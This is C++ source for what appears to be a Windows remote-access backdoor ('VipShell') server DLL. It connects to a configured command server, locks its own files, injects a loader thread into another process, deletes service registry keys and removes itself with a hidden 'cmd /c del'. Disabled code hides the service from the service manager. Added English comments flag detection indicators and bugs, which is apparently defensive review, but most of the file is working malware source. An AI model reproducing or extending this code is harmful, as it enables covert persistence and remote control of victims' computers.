//hServer.ConnectServer(hServerConfig->szUrl);
//hServer.ConnectServer(hServerConfig->szIp, _ttoi(hServerConfig->szIp_Port));
if( _ttoi(Conf_URLDNS) == 1 )//==1为URL方式上线
{
hServer.ConnectServer(Conf_Url);
dbglog("采用URL方式连接客户端");
}
if( _ttoi(Conf_URLDNS) == 2 )//==2为DNS方式上线
{
hServer.ConnectServer(Conf_Ip, _ttoi(Conf_Ip_Port));
dbglog("采用DNS方式连接客户端");
}
//srand((unsigned)time(NULL));
//Sleep((DWORD)rand() % 1500);
//锁定服务端DLL
char DllPath[MAX_PATH]={0};
GetModuleFileNameA(g_hinstDLL,DllPath,MAX_PATH);
DllLockHandle = OpenFile(DllPath,&ofstruct,OF_READ|OF_SHARE_EXCLUSIVE);
//锁定服务端EXE
char ExePath[MAX_PATH];//
GetModuleFileNameA(g_hinstDLL,DllPath,MAX_PATH);
strncpy(DllPath + strlen(DllPath) - 3,"",1);//去掉自身路径末尾的 dll
strcpy(ExePath,DllPath);
strcat(ExePath,"exe");
ExeLockHandle = OpenFile(ExePath,&ofstruct,OF_READ|OF_SHARE_EXCLUSIVE);
while(1)
{
dbglog("服务端正在运行,傀儡进程存活");
Sleep(300000);//5 min
}
WSACleanup();
}
//extern "C" __declspec(dllexport) bool HideService()
//{
// ////COpenDesktop hDesktop;
// ////COpenDesktop hDesktop1;
//
// //LPVIPSHELLCONFIG hServerConfig = (LPVIPSHELLCONFIG)lp;
//
// //srand((unsigned)time(NULL));
// //Sleep((DWORD)rand() % 3000);
//
// ////开始摘除服务链
// // int i;
// // for (i = 0x300000;i<0x5000000;i+=4){
// // //printf("%x\n",i);
// // __try{
// // if (0 == wcsicmp((const unsigned short *)i,hServerConfig->szServiceName)){
// // char temp [32];
// // sprintf(temp,"found service at: %x\n",i);
// // SearchDWORD(i,hServerConfig->szServiceName);
// // }
// // }
// // __except(EXCEPTION_EXECUTE_HANDLER ){
// // //printf("error\n");
// // i-=4;
// // i += 0x1000;
// // }
// // }
// ////摘除服务链
//
// return 0;
//}
//
//void SearchDWORD(int Addr,LPCTSTR HideServiceName)
//{
//int i;
//for (i = 0x300000;i<0x5000000;i+=4){
// //printf("%x\n",i);
// __try{
// if (Addr == *(ULONG*)i){
// char temp [32];
// sprintf(temp,"found the point at: %x\n",i);
//
// if (0 == wcsicmp((const unsigned short *)(*(ULONG*)(i+4)),HideServiceName)){
// //found the right one
// PFAKE_SERVICE_RECORD pRecord;
// pRecord = (PFAKE_SERVICE_RECORD)(i-8);
// *((DWORD*)pRecord->Prev+1) = (DWORD)(pRecord->Next);
// *((DWORD*)pRecord->Next) = (DWORD)(pRecord->Prev);
// }
// }
// }
// __except(EXCEPTION_EXECUTE_HANDLER ){
// //printf("error\n");
// i-=4;
// i += 0x1000;
//
// }
//}
//
//}
// Exported entry used by the loader: hands back the file-scope g_hDllModule
// object (cast to CDllModuleControlInterface*) through *p.
// p: out-parameter; it is dereferenced without a NULL check.
// Returns true unconditionally.
// Defender note: "GetDllModuleControl" appears in the DLL's export table and
// is a usable static indicator for this component.
extern "C" __declspec(dllexport) bool GetDllModuleControl(CDllModuleControlInterface** p)
{
*p = (CDllModuleControlInterface*)&g_hDllModule;
dbglog("LoadLibrary成功,等待Loader启动主函数"); // log: "LoadLibrary succeeded, waiting for the loader to start the main function"
return true;
}
// Thread routine that InjectHideMeRemote copies into another process.
// It takes LoadLibraryA/GetProcAddress/FreeLibrary from the ThreadParam block
// instead of from its own import table — presumably so that the copied bytes
// run without import resolution in the target (not verifiable from here).
// lpParameter: PThreadParam with the three API pointers, the DLL path
//   (szDllName) and the export to call (szFunctionName).
// Returns FALSE if the DLL or the export cannot be resolved; otherwise the
// BOOL returned by that export, which is invoked with a NULL argument. The
// DLL handle is released with FreeLibrary before returning.
// NOTE(review): the caller passes a fixed 2048-byte size for this function;
// nothing checks that the compiled body actually fits in that many bytes.
DWORD WINAPI HideMe(LPVOID lpParameter)
{
typedef BOOL (*PVipShellStartServer)(LPVOID lp);
PThreadParam a = (PThreadParam)lpParameter;
HINSTANCE hDll = NULL;
PVipShellStartServer pfnVipShellStartServer = NULL;
BOOL bFlag = FALSE;
hDll = a->pfnLoadLibraryA(a->szDllName);
if( !hDll ) return FALSE;
pfnVipShellStartServer = (PVipShellStartServer)a->pfnGetProcAddress(hDll, a->szFunctionName);
if( !pfnVipShellStartServer) return FALSE;
bFlag = pfnVipShellStartServer(/*&a->lp*/0); // the commented-out argument shows the config block was once passed here
a->pfnFreeLibrary(hDll);
return bFlag;
}
// Prepares a ThreadParam block and asks InjectRemote (defined elsewhere) to run
// HideMe inside hProcess, so that the target loads this DLL by path and calls
// the export named by szFnName.
// hProcess: handle to the target process, opened by the caller.
// szFnName: export name; copied with an unbounded strcpy into
//   tp.szFunctionName, so a name longer than that array overflows it.
// Only the outcome of InjectRemote is logged; nothing is returned.
// Defender note: the target ends up loading this DLL from its on-disk path
// (tp.szDllName is this module's own file name), which is visible in the
// target's module list and in image-load telemetry.
void InjectHideMeRemote(HANDLE hProcess,/*DWORD dwProcessId,*/ /*LPVIPSHELLCONFIG lp*/ LPCSTR szFnName)
{
ThreadParam tp;
HINSTANCE hKernel32 = NULL;
//DWORD dwPid;
DWORD dwFuncSize = 2048; // assumed size of HideMe's code; not computed, see HideMe
//dwPid = dwProcessId;
hKernel32 = GetModuleHandle( L"kernel32.dll" );
// The three API pointers are resolved here so HideMe does not need its own imports.
tp.pfnGetProcAddress = (PGetProcAddress)GetProcAddress(hKernel32, "GetProcAddress");
tp.pfnLoadLibraryA = (PLoadLibraryA)GetProcAddress(hKernel32, "LoadLibraryA");
tp.pfnFreeLibrary = (PFreeLibrary)GetProcAddress(hKernel32, "FreeLibrary");
strcpy(tp.szFunctionName, szFnName); // unbounded copy; length of szFnName is never checked
GetModuleFileNameA((HINSTANCE)g_hinstDLL, tp.szDllName, MAX_PATH);
//memcpy(&tp.lp, lp, sizeof(VIPSHELLCONFIG));
if(InjectRemote(hProcess, /*dwPid,*/ HideMe, dwFuncSize, &tp, sizeof(tp), /*1000*/INFINITE))
{
dbglog("开始创建远程线程"); // log: "starting to create the remote thread"
}
else
{
dbglog("开始创建远程线程失败"); // log: "creating the remote thread failed"
}
}
// Uninstall thread: removes the service named by Conf_ServiceName (registry
// keys and SCM entry, each attempted twice), releases the file locks taken on
// the DLL and EXE, deletes the sibling .exe, schedules deletion of this DLL via
// SelfDelete, and terminates the process.
// lpParameter: unused.
// Never returns normally: ExitProcess(0) ends the process, so the trailing
// `return 0;` is unreachable.
// Defender note: the artifacts touched here are the service key under
// HKLM\System\CurrentControlSet\Services\<Conf_ServiceName> and an .exe with
// the same base name as this DLL in the same directory.
DWORD WINAPI RemoveServer(LPVOID lpParameter)//Remove
{
char ExePath[MAX_PATH];//
char DllPath[MAX_PATH];//
RemoveServiceByReg(Conf_ServiceName);
RemoveService(Conf_ServiceName);
RemoveServiceByReg(Conf_ServiceName);
RemoveService(Conf_ServiceName);
// Each lock handle is closed twice. The second CloseHandle on an already
// closed handle fails with an invalid-handle error, or worse, closes an
// unrelated handle if the value has been reused in the meantime.
CloseHandle((HANDLE)ExeLockHandle);
CloseHandle((HANDLE)DllLockHandle);
CloseHandle((HANDLE)ExeLockHandle);
CloseHandle((HANDLE)DllLockHandle);
//GetSystemDirectory(EXEDir,MAX_PATH);
GetModuleFileNameA((HINSTANCE)g_hinstDLL, DllPath , MAX_PATH);
// Copies one byte of "" (the terminator) to position len-3, i.e. truncates
// the path just before a trailing "dll". Assumes the path ends in "dll" and
// is at least 3 characters long; a shorter result would index before the buffer.
strncpy(DllPath + strlen(DllPath) - 3,"",1);// strip the trailing "dll" from our own path
strcpy(ExePath,DllPath);
strcat(ExePath,"exe");
DeleteFileA(ExePath);
DeleteFileA(ExePath); // repeated; return value of neither call is checked
//drvldr_stop("NTboot32");// try to stop the driver
//Sleep(5);
//drvldr_dereg("NTboot32");// try to unregister the driver
//Sleep(5);
//DeleteFileA(EXEDir);
//DeleteFileA(SYSDir);
//RemoveDelayLoad();
//RemoveService(L"NTboot");
Sleep(1);
dbglog("卸载完成"); // log: "uninstall complete"
Sleep(1);
SelfDelete();
ExitProcess(0);// exit the process
return 0; // unreachable after ExitProcess
}
// Arranges for this DLL file to be deleted after the process exits: launches
// `%COMSPEC% /c del <short path of this module> > nul` as a suspended,
// detached process, lowers its priority, and resumes it.
// Returns TRUE once the child has been resumed; FALSE if the module path,
// short path, COMSPEC lookup or CreateProcess fails. The final `return 0;`
// is unreachable.
// NOTE(review): szComspec (MAX_PATH) receives COMSPEC plus the whole of
// szParams via lstrcat with no bound, so a long module path can overflow it.
// The priority juggling presumably keeps the child from reaching `del`
// before this process has released the file — not verifiable from here.
// Defender note: the spawned cmd.exe command line (" /c del ... > nul")
// is the observable artifact of this routine.
BOOL SelfDelete()
{
TCHAR szModule [MAX_PATH],
szComspec[MAX_PATH],
szParams [MAX_PATH];
// Obtain the module path:
if((GetModuleFileName((HINSTANCE)g_hinstDLL,szModule,MAX_PATH)!=0) &&
(GetShortPathName(szModule,szModule,MAX_PATH)!=0) &&
(GetEnvironmentVariable(L"COMSPEC",szComspec,MAX_PATH)!=0))
{
// Build the command arguments
lstrcpy(szParams,L" /c del ");
lstrcat(szParams,szModule);
lstrcat(szParams,L" > nul");
lstrcat(szComspec,szParams); // unbounded append into a MAX_PATH buffer
// Fill in the startup structures
STARTUPINFO si={0};
PROCESS_INFORMATION pi={0};
si.cb = sizeof(si);
si.dwFlags = STARTF_USESHOWWINDOW;
si.wShowWindow = SW_HIDE;
// Raise our own priority
SetPriorityClass(GetCurrentProcess(),
REALTIME_PRIORITY_CLASS);
SetThreadPriority(GetCurrentThread(),
THREAD_PRIORITY_TIME_CRITICAL);
// Launch the command
if(CreateProcess(0, szComspec, 0, 0, 0,CREATE_SUSPENDED|
DETACHED_PROCESS, 0, 0, &si, &pi))
{
// Keep the command at the lowest priority until this program exits
SetPriorityClass(pi.hProcess,IDLE_PRIORITY_CLASS);
SetThreadPriority(pi.hThread,THREAD_PRIORITY_IDLE);
// Resume the command at low priority
ResumeThread(pi.hThread);
// pi.hProcess / pi.hThread are never closed
return TRUE;
}
else // on failure, restore our normal priority
{
SetPriorityClass(GetCurrentProcess(),
NORMAL_PRIORITY_CLASS);
SetThreadPriority(GetCurrentThread(),
THREAD_PRIORITY_NORMAL);
}
}
return FALSE;
return 0; // unreachable
}
//void RemoveDelayLoad(void)
//{
// RegDeleteKey(HKEY_CLASSES_ROOT,L"CLSID\\{bfbc1a78-cddd-1672-876e-324d6c4686e9}");
// RegDeleteKey(HKEY_LOCAL_MACHINE,L"SOFTWARE\\Classes\\CLSID\\{bfbc1a78-cddd-1672-876e-324d6c4686e9}");
// //RegDeleteKey(HKEY_LOCAL_MACHINE,L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\ShellServiceObjectDelayLoad\\{bfbc1a78-cddd-1672-876e-324d6c4686e9}");
// if(RegDeleteKey(HKEY_LOCAL_MACHINE,L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\ShellServiceObjectDelayLoad"))
// {
// dbglog("删除注册表键值成功");
// }
// else
// {
// dbglog("注册表键值已经清除");
// }
//}
//
//void RemoveRunKey(void)
//{
// RegDeleteKey(HKEY_LOCAL_MACHINE,L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\policies\\Explorer\\Run");
//}
// Deletes the registry footprint of a service directly, without the SCM:
// HKLM\System\CurrentControlSet\Services\<ServiceName>\Enum,
// ...\<ServiceName>\Security, and finally ...\<ServiceName> itself.
// The subkeys are removed first because RegDeleteKey cannot delete a key that
// still has subkeys.
// ServiceName: appended with lstrcat into 512-WCHAR buffers with no bound
//   check; a very long name overflows them.
// All RegDeleteKey results are ignored.
// Defender note: these key deletions are observable via registry auditing.
void RemoveServiceByReg(LPCTSTR ServiceName)
{
WCHAR regkeyEnum[512]={0};
WCHAR regkeySecurity[512]={0};
WCHAR regkey[512]={0};
lstrcat(regkeyEnum,L"System\\CurrentControlSet\\Services\\");
lstrcat(regkeyEnum,ServiceName);
lstrcat(regkeyEnum,L"\\Enum");
RegDeleteKey(HKEY_LOCAL_MACHINE, regkeyEnum);
lstrcat(regkeySecurity,L"System\\CurrentControlSet\\Services\\");
lstrcat(regkeySecurity,ServiceName);
lstrcat(regkeySecurity,L"\\Security");
RegDeleteKey(HKEY_LOCAL_MACHINE, regkeySecurity);
lstrcat(regkey,L"System\\CurrentControlSet\\Services\\");
lstrcat(regkey,ServiceName);
RegDeleteKey(HKEY_LOCAL_MACHINE, regkey);
return;
}
// Stops and deletes a service through the Service Control Manager.
// ServiceName: the service to remove.
// Flow: open the SCM and the service; if the service is running, send
// SERVICE_CONTROL_STOP and poll every 10 ms while it is STOP_PENDING; then
// call DeleteService (which marks the service for deletion).
// Defects visible here, left as found:
//  - OpenSCManager's result is never checked; OpenService is called with
//    whatever it returned.
//  - When OpenService fails, schSCManager is closed inside the if and again
//    at the end, and CloseServiceHandle is called on the NULL schService.
//  - The STOP_PENDING loop ignores QueryServiceStatus failures; if the call
//    starts failing while the state is still STOP_PENDING the loop never ends.
// Every commented-out printf marks a branch whose result is not acted on.
void RemoveService(LPCTSTR ServiceName)
{
SC_HANDLE schSCManager;
SC_HANDLE schService;
SERVICE_STATUS RemoveServiceStatus;
schSCManager=OpenSCManager(0,NULL,SC_MANAGER_ALL_ACCESS);
schService=OpenService(schSCManager,ServiceName,SERVICE_ALL_ACCESS);
if(schService==NULL)
{
CloseServiceHandle(schSCManager); // closed again at the end of the function
}
else
{
//printf("Stopping Service .... ");
if(QueryServiceStatus(schService,&RemoveServiceStatus)!=0)
{
if(RemoveServiceStatus.dwCurrentState==SERVICE_STOPPED)
{
//printf("already Stopped !\n");
}
else
{
//printf("Pending ... ");
if(ControlService(schService,SERVICE_CONTROL_STOP,&RemoveServiceStatus)!=0)
{
// Unbounded wait: no timeout, no check of the QueryServiceStatus result.
while(RemoveServiceStatus.dwCurrentState==SERVICE_STOP_PENDING)
{
Sleep(10);
QueryServiceStatus(schService,&RemoveServiceStatus);
}
if(RemoveServiceStatus.dwCurrentState==SERVICE_STOPPED)
{
//printf("Success !\n");
}
else
{
//printf("Failure !\n");
}
}
else
{
//printf("Failure !\n");
}
}
}
else
{
//printf("Query Failure !\n");
}
//printf("Removing Service .... ");
if(DeleteService(schService)==0)
{
//printf("Failure !\n");
}
else
{
//printf("Success !\n");
}
}
CloseServiceHandle(schSCManager);
CloseServiceHandle(schService); // NULL when OpenService failed
return ;
}
// DLL entry point. The only live behaviour is recording the module handle in
// the file-scope g_hinstDLL; TRUE is returned for every call reason.
// hinstDLL: this module's instance handle.
// hModule: occupies the position of fdwReason in the documented DllMain
//   signature (a DWORD); it is declared as HANDLE here and never read.
// lpReserved: unused.
// The block comment below is disabled code that, when the DLL was loaded into
// explorer.exe, used a named file mapping as a single-instance guard and
// started a loader from the system directory. Being commented out, none of
// its strings or calls are present in the compiled binary.
BOOL APIENTRY DllMain(HINSTANCE hinstDLL, HANDLE hModule,
LPVOID lpReserved
)
{
/*
////////////////////////////// When the DLL is detected to be loaded by explorer, start the main program
TCHAR szLoader[MAX_PATH];
GetModuleFileName(NULL, szLoader, MAX_PATH);
_tcslwr(szLoader);
if (_tcsstr(szLoader, _T("explorer.exe")))
{
dbglog("DLL 当前被 explorer.exe加载");  // log: "DLL is currently loaded by explorer.exe"
HANDLE hMap=CreateFileMappingA((HANDLE)0xFFFFFFFF, NULL,PAGE_READWRITE, 0, 128,"_B_y_s_h_e_l_l_1_0_9_");
if(hMap==NULL)// creation failed
{
dbglog("创建互斥量对象失败");  // log: "failed to create the mutex object"
return FALSE; // leave this program
}
// If an object of this name already exists, another instance that must be exclusive is already running
else if(GetLastError()==ERROR_ALREADY_EXISTS)
{ LPVOID lpMem=MapViewOfFile(hMap, FILE_MAP_WRITE, 0,0,0);
UnmapViewOfFile(lpMem); // release the view
CloseHandle(hMap); // close the object
return FALSE;// leave this program
}
else // the checks above passed, so this is the first exclusive instance
{ LPVOID lpMem=MapViewOfFile(hMap, FILE_MAP_WRITE, 0,0,0);
UnmapViewOfFile(lpMem); // release the view
}
char szNTbootPath[MAX_PATH];
GetSystemDirectoryA(szNTbootPath,MAX_PATH);
strcat(szNTbootPath,"\\NTboot.exe");
if(WinExec(szNTbootPath,SW_HIDE))
{
dbglog("启动 Loader 成功");  // log: "starting the loader succeeded"
}
else
{
dbglog("启动 Loader 失败");  // log: "starting the loader failed"
}
}
//////////////////////////////
*/
g_hinstDLL = hinstDLL;
return TRUE;
}
// Loads the [Config] section of the INI-style file that sits next to this DLL
// with the same base name and a "dat" extension, into the file-scope Conf_*
// globals (Url, Explain, Ip, Ip_Port, FileName, ServiceName, DisplayName,
// Description, URLDNS, Inject).
// DelConfiger: when non-zero the config file is deleted after being read.
// Always returns 0 (false); the else branch is redundant with the final return.
// NOTE(review): each nSize argument is sizeof(Conf_X), i.e. a byte count,
// while the wide GetPrivateProfileString expects a count of characters. If
// the Conf_* globals are WCHAR arrays (their declarations are not in view),
// the limit is twice the real capacity and a long value can overflow them.
// Defender note: the "<dllname>.dat" sibling file and its keys are the
// configuration artifact of this component.
bool GetMyConfig(BOOL DelConfiger)
{
WCHAR DllPath[MAX_PATH]={0};
WCHAR szConfPath[MAX_PATH]={0};
GetModuleFileName((HINSTANCE)g_hinstDLL, DllPath , MAX_PATH);
// Writes a single L'\0' at position len-3, i.e. cuts the path just before a
// trailing "dll"; assumes the path ends that way and is at least 3 characters.
wcsncpy(DllPath + lstrlen(DllPath) - 3,L"",1);// strip the trailing "dll" from our own path
lstrcpy(szConfPath,DllPath);
lstrcat(szConfPath,L"dat");
GetPrivateProfileString(L"Config",L"Url",NULL,Conf_Url,sizeof(Conf_Url),szConfPath);
GetPrivateProfileString(L"Config",L"Explain",NULL,Conf_Explain,sizeof(Conf_Explain),szConfPath);
GetPrivateProfileString(L"Config",L"Ip",NULL,Conf_Ip,sizeof(Conf_Ip),szConfPath);
GetPrivateProfileString(L"Config",L"Ip_Port",NULL,Conf_Ip_Port,sizeof(Conf_Ip_Port),szConfPath);
GetPrivateProfileString(L"Config",L"FileName",NULL,Conf_FileName,sizeof(Conf_FileName),szConfPath);
GetPrivateProfileString(L"Config",L"ServiceName",NULL,Conf_ServiceName,sizeof(Conf_ServiceName),szConfPath);
GetPrivateProfileString(L"Config",L"DisplayName",NULL,Conf_DisplayName,sizeof(Conf_DisplayName),szConfPath);
GetPrivateProfileString(L"Config",L"Description",NULL,Conf_Description,sizeof(Conf_Description),szConfPath);
GetPrivateProfileString(L"Config",L"URLDNS",NULL,Conf_URLDNS,sizeof(Conf_URLDNS),szConfPath);
GetPrivateProfileString(L"Config",L"Inject",NULL,Conf_Inject,sizeof(Conf_Inject),szConfPath);
if(DelConfiger)
{
DeleteFile(szConfPath); // result not checked
}
else
{
return 0;
}
return 0;
}
// Writes a REG_SZ value named "Explain" under
// HKLM\SYSTEM\CurrentControlSet\Services\<Conf_ServiceName>.
// Explain: the string to store. Note the key is chosen from the global
//   Conf_ServiceName, not from the parameter.
// Always returns 0 (false).
// Defects visible here, left as found:
//  - RegOpenKeyEx's result is ignored; on failure hKeyExplain is
//    uninitialized and RegSetValueEx/RegCloseKey operate on garbage.
//  - cbData is a fixed 256 bytes regardless of the real length of Explain,
//    so a shorter string over-reads past its terminator and a longer one is
//    truncated; the conventional size is (lstrlen(Explain)+1)*sizeof(WCHAR).
// Defender note: a non-standard "Explain" value on a service key is an
// unusual artifact worth flagging in registry review.
bool SetMyExplain(LPCTSTR Explain)
{
HKEY hKeyExplain;
WCHAR KeyExplain[512]={0};
lstrcpy(KeyExplain,L"SYSTEM\\CurrentControlSet\\Services\\");
lstrcat(KeyExplain,Conf_ServiceName); // unbounded append into a 512-WCHAR buffer
RegOpenKeyEx(HKEY_LOCAL_MACHINE,KeyExplain,0,KEY_ALL_ACCESS,&hKeyExplain);
RegSetValueEx(hKeyExplain,L"Explain",0,REG_SZ,(const BYTE *)Explain,256);
RegCloseKey(hKeyExplain);
return 0;
}